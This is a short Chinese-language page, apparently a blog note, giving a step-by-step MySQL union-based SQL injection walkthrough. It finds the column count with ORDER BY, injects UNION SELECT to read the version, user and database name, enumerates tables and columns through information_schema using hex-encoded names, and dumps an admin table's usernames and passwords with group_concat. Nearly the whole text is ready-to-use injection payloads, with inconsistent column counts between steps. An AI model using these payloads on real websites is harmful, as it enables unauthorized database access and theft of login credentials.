MySql
时间:2021-07-01 10:21:17
帮助过:2人阅读
order by 17 正常
order by 18 不正常 说明列数是17
id=2+union+select+1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18-- 用加号 --号注释掉后面的语句
+and+1=2+UNION+SELECT+1,
2,
3,
4,
5,
6,
7,
8,
9,
database(),
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22 版本
user() 用户
database() 数据库名称 shsjk
查到数据库名称后转换成16进制 小葵
爆表名 (5.00之后) wz_jj_admin
+and+1=2+UNION+SELECT+1,
2,
3,
4,
5,
6,
7,
8,
9,group_concat(table_name),
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22 from information_schema.tables
where table_schema
=0x7368736A6B [数据库名16进制]
爆列名 ad_username,ad_password
+and+1=2+UNION+SELECT+1,
2,
3,
4,
5,
6,
7,
8,
9,group_concat(column_name),
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22 from information_schema.columns
where table_name
=0x777A5F6A6A5F61646D696E[列名16进制]
爆出ad_username,ad_password的数据
union select 1,group_concat(ad_username,ad_password),
3,
4,
5,
6,
7,
8,
9,
10 from wz_jj_admin 这样不用
MySql
标签:
